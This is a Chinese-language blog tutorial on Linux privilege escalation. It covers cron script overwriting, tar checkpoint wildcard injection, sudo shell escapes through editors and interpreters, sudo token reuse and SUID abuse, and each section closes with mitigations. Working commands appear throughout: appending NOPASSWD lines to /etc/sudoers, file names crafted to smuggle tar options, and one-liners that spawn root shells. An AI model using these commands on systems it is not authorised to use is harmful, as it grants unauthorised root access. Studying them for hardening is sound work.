<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT">










<meta name="description" content="Linux提权">
<meta property="og:type" content="article">
<meta property="og:title" content="Linux常见提权问题">
<meta property="og:url" content="http://yoursite.com/2020/03/10/Linux常见提权问题/index.html">
<meta property="og:site_name" content="Eight Dimensions">
<meta property="og:description" content="Linux提权">
<meta property="og:locale" content="zh-CN">
<meta property="og:image" content="http://yoursite.com/2020/03/10/Linux常见提权问题/image-20200107165535034.png">
<meta property="og:image" content="http://yoursite.com/2020/03/10/Linux常见提权问题/image-20200107170116227.png">
<meta property="og:image" content="http://yoursite.com/2020/03/10/Linux常见提权问题/060222119B4067DBCF826274C192BCF0.jpg">
<meta property="og:image" content="http://yoursite.com/2020/03/10/Linux常见提权问题/image-20200107213041054.png">
<meta property="og:image" content="http://yoursite.com/2020/03/10/Linux常见提权问题/image-20200107215518111.png">
<meta property="og:image" content="http://yoursite.com/2020/03/10/Linux常见提权问题/image-20200107220020437.png">
<meta property="og:image" content="http://yoursite.com/2020/03/10/Linux常见提权问题/image-20200108161042891.png">
<meta property="og:image" content="http://yoursite.com/2020/03/10/Linux常见提权问题/image-20200113182946193.png">
<meta property="og:image" content="http://yoursite.com/2020/03/10/Linux常见提权问题/image-20200116182608608.png">
<meta property="og:image" content="http://yoursite.com/2020/03/10/Linux常见提权问题/image-20200120162201249.png">
<meta property="og:image" content="http://yoursite.com/2020/03/10/Linux常见提权问题/image-20200120174759597.png">
<meta property="og:updated_time" content="2020-03-10T15:57:04.024Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Linux常见提权问题">
<meta name="twitter:description" content="Linux提权">
<meta name="twitter:image" content="http://yoursite.com/2020/03/10/Linux常见提权问题/image-20200107165535034.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://yoursite.com/2020/03/10/Linux常见提权问题/">





  <title>Linux常见提权问题 | Eight Dimensions</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Eight Dimensions</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br>
            
            Categories
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://yoursite.com/2020/03/10/Linux常见提权问题/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Shad0w">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Eight Dimensions">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Linux常见提权问题</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2020-03-10T23:27:25+08:00">
                2020-03-10
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>Linux提权</p>
<a id="more"></a>



<h1 id="Linux常见提权问题"><a href="#Linux常见提权问题" class="headerlink" title="Linux常见提权问题"></a>Linux常见提权问题</h1><h2 id="Linux-crontab提权"><a href="#Linux-crontab提权" class="headerlink" title="Linux crontab提权"></a>Linux crontab提权</h2><h3 id="Crontab文件覆写"><a href="#Crontab文件覆写" class="headerlink" title="Crontab文件覆写"></a>Crontab文件覆写</h3><h4 id="环境搭建"><a href="#环境搭建" class="headerlink" title="环境搭建"></a>环境搭建</h4><p>以下测试均在ubuntu18.04下进行</p>
<p>Ubuntu切换到root账号<code>sudo su</code>，新建一个测试账号<code>adduser test</code>。然后根据系统提示进行密码和注释性描述的配置，全程不用自己输入其他命令即可配置成功，用户主目录和命令解析程序都是系统自动指定。</p>
<p>cat /etc/passwd 可看到<code>test:x:1001:1001:,,,:/home/test:/bin/bash</code></p>
<blockquote>
<p>不要用useradd，这种方式只能在控制台中互相切换用户，一旦重启系统，用该用户还是无法登陆（只能用原来的用户或root登陆）。</p>
</blockquote>
<p>不在<code>/etc/sudoers</code>下添加test账号，当前test账户无法执行sudo命令</p>
<h4 id="模拟cron计划任务"><a href="#模拟cron计划任务" class="headerlink" title="模拟cron计划任务"></a>模拟cron计划任务</h4><p>模拟一个定时任务需要，需要定时删除test账户cleanup目录下的文件。</p>
<p>切换到test用户，并创建cleanup目录，添加一些文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">su <span class="built_in">test</span></span><br><span class="line"><span class="built_in">cd</span></span><br><span class="line">mkdir cleanup &amp;&amp; <span class="built_in">cd</span> cleanup</span><br><span class="line"><span class="built_in">echo</span> <span class="string">""</span> &gt; 1.txt</span><br><span class="line"><span class="built_in">echo</span> <span class="string">""</span> &gt; 2.txt</span><br><span class="line"><span class="built_in">echo</span> <span class="string">""</span> &gt; 3.txt</span><br></pre></td></tr></table></figure>

<p>并创建计划任务的脚本文件<code>cleanup.py</code>，并赋予权限<code>chmod 777 cleanup.py</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">try</span>:</span><br><span class="line">   os.system(<span class="string">'rm -r /home/test/cleanup/* '</span>)</span><br><span class="line"><span class="keyword">except</span>:</span><br><span class="line">    sys.exit()</span><br></pre></td></tr></table></figure>

<p>root用户添加cron计划任务，每2分钟执行一次cleanup.py</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">*/2 *	*	*	*	/tmp/cleanup.py</span><br></pre></td></tr></table></figure>

<p><img src="image-20200107165535034.png" alt="image-20200107165535034"></p>
<p>cron计划任务成功执行。</p>
<h4 id="提权"><a href="#提权" class="headerlink" title="提权"></a>提权</h4><p>当拥有test账户的时候，可以直接修改<code>cleanup.py</code>提权。提权的方式有很多，这里尝试添加<code>/bin/dash</code>的sid实现。</p>
<p>修改前：</p>
<p><img src="image-20200107170116227.png" alt="image-20200107170116227"></p>
<p>test账户下，修改<code>cleanup.py</code>的<code>os.system</code>命令</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">try</span>:</span><br><span class="line">   os.system(<span class="string">'chmod u+s /bin/dash'</span>)</span><br><span class="line"><span class="keyword">except</span>:</span><br><span class="line">    sys.exit()</span><br></pre></td></tr></table></figure>

<p><img src="060222119B4067DBCF826274C192BCF0.jpg" alt="060222119B4067DBCF826274C192BCF0"></p>
<p>在18.04上复现不成功，<strong>据说在ubuntu16以上的版本都无法通过直接修改dash 属性的方式提权</strong>。</p>
<p>但是可以直接在<code>/etc/sudoers</code>添加当前账号的sudo权限，并设置为<code>NOPASSWD</code>，这样甚至还不需要输入当前用户的密码。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">try</span>:</span><br><span class="line">   os.system(<span class="string">'echo "test ALL=(root) NOPASSWD: ALL" &gt;&gt; /etc/sudoers'</span>)</span><br><span class="line"><span class="keyword">except</span>:</span><br><span class="line">    sys.exit()</span><br></pre></td></tr></table></figure>

<p><img src="image-20200107213041054.png" alt="image-20200107213041054"></p>
<p>已成功提权。</p>
<p>还有很多方式，例如直接写一个ssh公钥等等等…</p>
<h4 id="提权条件"><a href="#提权条件" class="headerlink" title="提权条件"></a>提权条件</h4><p>在以上复现过程，看上去需要两个条件</p>
<ol>
<li>root用户配置crontab任务时使用test用户的cleanup.py</li>
<li>test用户有权限编辑cleanup.py（cleanup.py 权限为777）</li>
</ol>
<p>尝试修改cleanup.py拥有者为root并设置仅root可读写执行<code>chmod 700 cleanup.py</code></p>
<p><img src="image-20200107215518111.png" alt="image-20200107215518111"></p>
<p>test用户已经没有权限修改cleanup.py了。</p>
<p>但需要注意的是，<strong>如果cleanup.py在test用户的/home/test目录下呢？</strong></p>
<p><img src="image-20200107220020437.png" alt="image-20200107220020437"></p>
<p>发现即便test用户没有权限修改cleanup.py文件，但是却可以重命名、移动这个文件。这说明<strong>test用户可以任意修改用户目录下的文件</strong></p>
<p>因此其实利用crontab文件覆写提权需要满足以下两个条件之一：</p>
<ol>
<li>root用户配置crontab任务时使用test用户的脚本文件（test用户拥有文件的所有权限）</li>
<li>root用户配置crontab任务时使用的脚本文件在test用户目录下</li>
</ol>
<h3 id="Crontab-Tar-Wildcard注入"><a href="#Crontab-Tar-Wildcard注入" class="headerlink" title="Crontab Tar Wildcard注入"></a>Crontab Tar Wildcard注入</h3><h4 id="模拟cron计划任务-1"><a href="#模拟cron计划任务-1" class="headerlink" title="模拟cron计划任务"></a>模拟cron计划任务</h4><p>设定一个定时任务来运行tar程序，每分钟备份1次/html文件夹到<code>/var/backups</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nano /etc/crontab</span><br><span class="line">*/1 *   * * *   root tar -zcPf /var/backups/html.tgz /var/www/html/*</span><br></pre></td></tr></table></figure>

<p>并在<code>/var/www/html</code>目录下创建一些文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">""</span> &gt; a.html</span><br><span class="line"><span class="built_in">echo</span> <span class="string">""</span> &gt; b.html</span><br><span class="line"><span class="built_in">echo</span> <span class="string">""</span> &gt; c.html</span><br></pre></td></tr></table></figure>

<h4 id="提权-1"><a href="#提权-1" class="headerlink" title="提权"></a>提权</h4><p>当拥有test账号之后，可以进入/var/www/html这个目录，创建脚本文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">'echo "test ALL=(root) NOPASSWD: ALL" &gt; /etc/sudoers'</span> &gt;test.sh</span><br><span class="line"><span class="built_in">echo</span> <span class="string">""</span> &gt; <span class="string">"--checkpoint-action=exec=sh test.sh"</span></span><br><span class="line"><span class="built_in">echo</span> <span class="string">""</span> &gt; --checkpoint=1</span><br></pre></td></tr></table></figure>

<p>简单说明下，tar的checkpoint相关参数：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">--checkpoint[=NUMBER]</span><br><span class="line">      display progress messages every NUMBERth record (default 10)</span><br><span class="line">--checkpoint-action=ACTION</span><br><span class="line">      execute ACTION on each checkpoint</span><br></pre></td></tr></table></figure>

<p>上面的例子中我们创建了相关的文件，实际在执行过程中，由于我们将checkpoint值设为1，即每个文件执行一次action动作，其就将文件当成了参数，执行了sh test.sh的动作，而由于我们的crontab任务是以root权限运行的。所以test.sh里的内容都会以root权限执行</p>
<p>但实际上不是特别可行，直接用root用户尝试执行一下<code>tar -zcPf /var/backups/html.tgz /var/www/html/*</code>，返回</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">/var/www/html/--checkpoint=1</span><br><span class="line">/var/www/html/--checkpoint-action=<span class="built_in">exec</span>=sh test.sh</span><br><span class="line">/var/www/html/test.sh</span><br></pre></td></tr></table></figure>

<p>带上了tar压缩文件的路径的话，会把这个路径添加进去，导致不能成功运行<code>test.sh</code></p>
<p>再尝试执行切换到<code>/var/www/html</code>目录下执行<code>tar -zcf /var/backups/html.tgz *</code>，返回</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">test.sh</span><br></pre></td></tr></table></figure>

<p><img src="image-20200108161042891.png" alt="image-20200108161042891"></p>
<p>可以看到成功执行了<code>test.sh</code></p>
<p>这种提权方式利用条件相对比较苛刻，但是不排除会有把压缩命令放在/var/www/html下的脚本然后在crontab定时执行脚本的情况。</p>
<h4 id="防护措施"><a href="#防护措施" class="headerlink" title="防护措施"></a>防护措施</h4><p>crontab定时任务是LINUX上最常用的一个功能，不过使用不当很容易受到提权。</p>
<p>使用crontab时请注意以下两点：</p>
<ul>
<li>crontab任务尽量不要写到/etc/crontab文件里，通过crontab -e去创建，让他写到默认的/var/spool/cron下</li>
</ul>
<ul>
<li>能不用 root 去创建尽量不用，如果一定要用root，请保存到一个其他用户进不去、改不了、看不了的位置（最好能用chattr处理下）</li>
</ul>
<h2 id="sudo提权"><a href="#sudo提权" class="headerlink" title="sudo提权"></a>sudo提权</h2><h3 id="sudo简介"><a href="#sudo简介" class="headerlink" title="sudo简介"></a>sudo简介</h3><blockquote>
<p><code>Sudo</code>是<code>linux</code>系统管理指令，允许系统管理员委派授权给某些用户（或用户组）以root用户或其他用户身份运行某些（或全部）命令的能力，同时提供命令及其参数的审计跟踪。官网：<a href="https://www.sudo.ws/" target="_blank" rel="noopener">https://www.sudo.ws</a></p>
</blockquote>
<p><strong>特性</strong></p>
<ul>
<li>能够授权指定用户在指定主机上运行某些命令。 如果未授权用户尝试使用 sudo，会提示联系管理员。</li>
<li>可以提供日志，记录每个用户使用sudo操作。</li>
<li>为系统管理员提供配置文件，允许系统管理员集中地管理用户的使用权限和使用的主机。</li>
<li>使用时间戳文件来完成类似“检票”的系统，默认存活期为5分钟的“入场券” 。</li>
</ul>
<p><strong>sudo相关文件</strong></p>
<p>配置文件：<code>/etc/sudoers</code>,<code>etc/sudoers.d</code> 可以修改<code>/etc/sudoers</code>也可以<code>/etc/sudoers.d</code>目录下新建配置文件</p>
<p>时间戳文件：<code>/var/db/sudo</code>、日志文件：<code>/var/log/secure</code></p>
<p><strong>授权规则</strong></p>
<p>user host=(runas) command</p>
<p>事例：<code>root ALL=(ALL) ALL</code></p>
<ul>
<li>root表示用户名</li>
<li>第一个ALL指示允许从任何终端、机器访问sudo</li>
<li>第二个(ALL)指示sudo命令被允许以任意用户身份执行</li>
<li>第三个ALL表示所有命令都可以作为root执行</li>
</ul>
<p>使用<code>sudo -l</code>查看当前权限</p>
<h3 id="sudo提权-1"><a href="#sudo提权-1" class="headerlink" title="sudo提权"></a>sudo提权</h3><h4 id="sudo执行原理"><a href="#sudo执行原理" class="headerlink" title="sudo执行原理"></a>sudo执行原理</h4><ul>
<li>普通用户执行命令</li>
<li>检查<code>/var/db/sudo/</code>目录下是否有用户时间戳（时间戳默认从上一次执行sudo命令5分钟后过期），ubuntu是在/var/run/sudo/ts/[username]下</li>
<li>检查<code>/etc/sudoers</code>配置文件，是否有sudo权限</li>
<li>执行sudo命令并返回结果</li>
<li>退出sudo返回普通用户shell环境</li>
</ul>
<p>zip、tar、strace、nmap、git、ftp、vim、find、passwd</p>
<p>perl、python、less、awk、man、vi</p>
<h4 id="sudo提权-2"><a href="#sudo提权-2" class="headerlink" title="sudo提权"></a>sudo提权</h4><p><strong>vi</strong></p>
<p>一个场景：允许test用户使用vi编辑<code>/root</code>目录下的<code>test.txt</code>文件</p>
<p>在<code>/etc/sudoers</code>添加<code>test    ALL=(ALL)    /usr/bin/vi    /root/test.txt</code></p>
<p>切换到test用户后，直接vi编辑/root/test.txt发现没有权限</p>
<p>使用<code>sudo vi /root/test.txt</code>并输入<code>:!bash</code>，提权成功</p>
<p><img src="image-20200113182946193.png" alt="image-20200113182946193"></p>
<p><strong>Zip</strong></p>
<p><code>sudo zip /tmp/test.zip /tmp/test -T --unzip-command=&quot;sh -c /bin/bash&quot;</code></p>
<p>-T 表示测试test.zip的完整性</p>
<p>–unzip-command 与 -T 一起使用，可以<strong>指定自定义命令用于解压test.zip</strong>，因此可以自定义解压命令是以root权限执行的，这里指定为<code>sh -c /bin/bash</code>，就可以以root权限获取一个shell</p>
<p><strong>tar</strong></p>
<p><code>sudo tar cf /dev/null testfile --checkpoint=1 --checkpoint-action=exec=/bin/bash</code></p>
<p>–checkpoint-action选项是提权点，可以自定义需要执行的动作，是以root权限执行并指定为exec=/bin/bash，以root权限执行/bin/bash，获取一个root权限的shell</p>
<p><strong>more</strong></p>
<p><code>sudo more /etc/rsyslog.conf</code></p>
<p>然后键入<code>!/bin/bash</code> 可获得root权限的shell，less和man同理（sudo man ssh）</p>
<p><strong>find</strong></p>
<p><code>sudo find /bin/ -name ls -exec /bin/bash</code></p>
<p>对于find检索到的每一个结果，是以root权限执行</p>
<p><strong>awd</strong></p>
<p><code>sudo awk &#39;BEGIN {system(&quot;/bin/bash&quot;)}&#39;</code></p>
<p><strong>strace</strong></p>
<p><code>sudo strace -o/dev/null /bin/bash</code></p>
<p>strace 以root权限运行跟踪调试/bin/bash，从而获取root权限的shell</p>
<p><strong>nmap</strong></p>
<p>以root权限执行nmap，指定nmap执行脚本获取root权限shell</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">"os.execute('/bin/sh')"</span> &gt; /tmp/shell.nse</span><br><span class="line">sudo nmap --script=/tmp/shell.nse</span><br></pre></td></tr></table></figure>

<p>低版本的nmap3.x</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap --interactive</span><br><span class="line">nmap&gt; !sh</span><br></pre></td></tr></table></figure>

<p><strong>git</strong></p>
<p><code>sudo git help status</code></p>
<p>然后键入<code>!/bin/bash</code>即可以以root权限执行/bin/bash，获得root权限的shell</p>
<p><strong>ftp</strong></p>
<p><code>sudo ftp</code></p>
<p>在ftp交互式接口下键入<code>!/bin/bash</code></p>
<p><strong>vim</strong></p>
<p><code>sudo vim -c &#39;!sh&#39;</code>直接以root权限运行指定命令</p>
<p><strong>perl</strong></p>
<p><code>sudo perl -e &#39;exec &quot;/bin/bash&quot;;&#39;</code></p>
<p><strong>python</strong></p>
<p><code>sudo python -c &#39;import pty;pty.spawn(&quot;/bin/bash&quot;)&#39;</code></p>
<h3 id="sudo缓存"><a href="#sudo缓存" class="headerlink" title="sudo缓存"></a>sudo缓存</h3><p>在sudo执行流程的第二步：检查<code>/var/db/sudo/</code>（<code>/var/run/sudo/ts/[username]</code>）目录下是否有用户时间戳。因此恶意程序可以监控这个时间戳文件，在允许时间范围内可利用sudo执行命令。</p>
<p>有一种利用sudo token实现的提权场景</p>
<p>前提要求：</p>
<ol>
<li><p>完全启用Ptrace（/proc/sys/kernel/yama/ptrace_scope == 0）</p>
</li>
<li><p>当前用户必须开启一个拥有有效sudo令牌并且相同uid的活动进程</p>
</li>
</ol>
<p><img src="image-20200116182608608.png" alt="image-20200116182608608"></p>
<p><strong>原理</strong></p>
<p>项目目录中的Exploit.sh会向当前用户的所有进程注入Shell代码，并使用它们的sudo令牌来验证我们自己的sudo口令，<a href="https://github.com/nongiach/sudo_inject" target="_blank" rel="noopener">exploit.sh地址</a></p>
<p><strong>修复建议</strong></p>
<ul>
<li><p>设置<code>timestamp_timeout</code>为0将要求用户每次<code>sudo</code>执行都输入密码</p>
</li>
<li><p>确保<code>tty_tickets</code>启用防止在tty会话之间发生泄漏</p>
</li>
</ul>
<h3 id="sudo提权缓解"><a href="#sudo提权缓解" class="headerlink" title="sudo提权缓解"></a>sudo提权缓解</h3><p>sudo的配置文件只能限制那些用户可以使用sudo，可以使用哪些命令，但不能限制用户使用这些命令进行提权获取root shell，我们设置sudo的本意就是让用户能临时获取root 权限执行某些命令而不是永久获取root shell 并可以root权限执行任何命令</p>
<ol>
<li><p>如非必须不要安装第三方工具命令</p>
<p>比如strace、ftp、nmap、tcpdump、except等命令，这些都不是必须但容易实现sudo提权的命令</p>
</li>
<li><p>sudo不能滥授权</p>
<p>根据权限最小化进行授权，仔细审核能不授权的不授权</p>
</li>
<li><p>使用堡垒机拦截非法命令</p>
<p>前置堡垒机，在堡垒机上进行非法命令拦截</p>
</li>
</ol>
<h2 id="setuid-amp-setgid-权限提升"><a href="#setuid-amp-setgid-权限提升" class="headerlink" title="setuid &amp; setgid 权限提升"></a>setuid &amp; setgid 权限提升</h2><h3 id="Linux-SETUID机制"><a href="#Linux-SETUID机制" class="headerlink" title="Linux SETUID机制"></a>Linux SETUID机制</h3><ol>
<li><p>进程运行时能够访问哪些资源或文件，不取决于进程文件的属主属组，而是取决于运行该命令的用户身份的ui d/gid，以该身份获取各种系统资源。</p>
</li>
<li><p>对一个属主为root的可执行文件，如果设置了SUID位，则其他普通用户都将可以以root身份运行该文件，获取相应的系统资源。</p>
<p>setuid的作用是让执行该命令的用户以该命令拥有者的权限去执行，比如普通用户执行passwd时会拥有root的权限，这样就可以修改/etc/passwd这个文件了。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">test</span>@<span class="built_in">test</span>-machine:~$ ll /usr/bin/passwd</span><br><span class="line">-rwsr-xr-x 1 root root 54256 5月  17  2017 /usr/bin/passwd*</span><br></pre></td></tr></table></figure>

<p>setuid的标志为<code>s</code>，出现在<code>x</code>的地方。比如上面passwd中<code>rws</code>，而setgid的意思和它是一样的，即让执行文件的用户以该文件所属组的权限去执行。</p>
</li>
<li><p>stick bit</p>
<p>/tmp是系统的临时文件目录，所有的用户在该目录下拥有所有权限。但用户A在/tmp目录下创建的文件，用户B是没有权限删除该文件的。这是stick bit(粘滞位)的概念。它是针对目录来说的，如果目录设置了stick bit，则该目录下的文件除了文件创建者和root可以删除和修改，其他用户均不能改动。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">test</span>@<span class="built_in">test</span>-machine:~$ ll -d /tmp/</span><br><span class="line">drwxrwxrwt 18 root root 4096 1月  20 15:43 /tmp//</span><br></pre></td></tr></table></figure>

<p>标志是<code>t</code></p>
</li>
</ol>
<h3 id="利用suid可执行程序提权"><a href="#利用suid可执行程序提权" class="headerlink" title="利用suid可执行程序提权"></a>利用suid可执行程序提权</h3><p>寻找设置了suid的可执行程序</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">find / -perm -u=s -<span class="built_in">type</span> f 2&gt;/dev/null</span><br></pre></td></tr></table></figure>

<p><strong>nmap</strong></p>
<blockquote>
<p>很多时候，管理员将为nmap设置SUID位以便能够有效地扫描网络，因为如果不使用root权限运行所有nmap扫描技术都无法正常工作。</p>
</blockquote>
<p>确认一下nmap是否有SUID位设置</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">test</span>@<span class="built_in">test</span>-machine:~$ <span class="built_in">which</span> nmap</span><br><span class="line">/usr/bin/nmap</span><br><span class="line"><span class="built_in">test</span>@<span class="built_in">test</span>-machine:~$ ll /usr/bin/nmap</span><br><span class="line">-rwsr-sr-x 1 root root 2770528 3月  31  2016 /usr/bin/nmap*</span><br></pre></td></tr></table></figure>

<p>测试过程中在ubuntu16 nmap7.01 通过–script指定nmap脚本的方式，已经不能成功提权（可以看到nmap中有对应的提醒<code>WARNING: Running Nmap setuid, as you are doing, is a major security risk.</code>）</p>
<p><img src="image-20200120162201249.png" alt="image-20200120162201249"></p>
<p>低版本的nmap3.x</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap --interactive</span><br><span class="line">nmap&gt; !sh</span><br></pre></td></tr></table></figure>

<p><strong>vim</strong></p>
<p>测试样例：</p>
<p>root用户在/tmp下创建一个test用户无法修改test.txt文件</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">test</span>@<span class="built_in">test</span>-machine:/root$ ll /tmp/test.txt </span><br><span class="line">-rw-r--r-- 1 root root 5 1月  20 17:44 /tmp/test.txt</span><br></pre></td></tr></table></figure>

<p>test用户尝试用vi以及尝试用vim去修改文件内容</p>
<p><img src="image-20200120174759597.png" alt="image-20200120174759597"></p>
<p>因此SUID 位不应在任何文件编辑器/编译器/解释程序上设置SUID位，因为攻击者可以轻松地读取/覆盖系统上存在的任何文件。</p>
<h3 id="缓解措施"><a href="#缓解措施" class="headerlink" title="缓解措施"></a>缓解措施</h3><p>应在整个系统中最小化设置了setuid或setgid位的程序的数量，并且检查对应程序是否存在缺陷能被恶意利用提权。</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/01/19/Cobra-php-parser简单分析/" rel="next" title="Cobra-php parser简单分析">
                <i class="fa fa-chevron-left"></i> Cobra-php parser简单分析
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2020/04/07/fastjson-reDOS-简单分析/" rel="prev" title="fastjson reDOS 简单分析">
                fastjson reDOS 简单分析 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
